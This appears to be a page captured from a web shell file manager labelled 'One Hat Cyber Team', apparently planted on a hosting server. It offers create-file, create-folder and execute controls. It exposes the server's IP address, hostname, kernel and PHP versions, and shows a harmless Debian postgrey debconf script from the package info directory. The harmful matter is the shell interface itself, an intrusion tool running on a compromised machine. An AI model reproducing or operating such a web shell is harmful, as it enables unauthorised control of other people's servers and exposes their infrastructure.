⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
lib
/
dpkg
/
info
/
View File Name :
postgrey.config
#! /bin/sh # debconf notice set -e . /usr/share/debconf/confmodule if [ "$1" != "configure" ]; then exit 0; fi if dpkg --compare-versions "$2" lt-nl "1.32-1" && \ [ -e /etc/postfix/main.cf ] && \ grep -q 'inet:127.0.0.1:60000' /etc/postfix/main.cf; then db_input critical postgrey/1.32-3_changeport || true db_go || true fi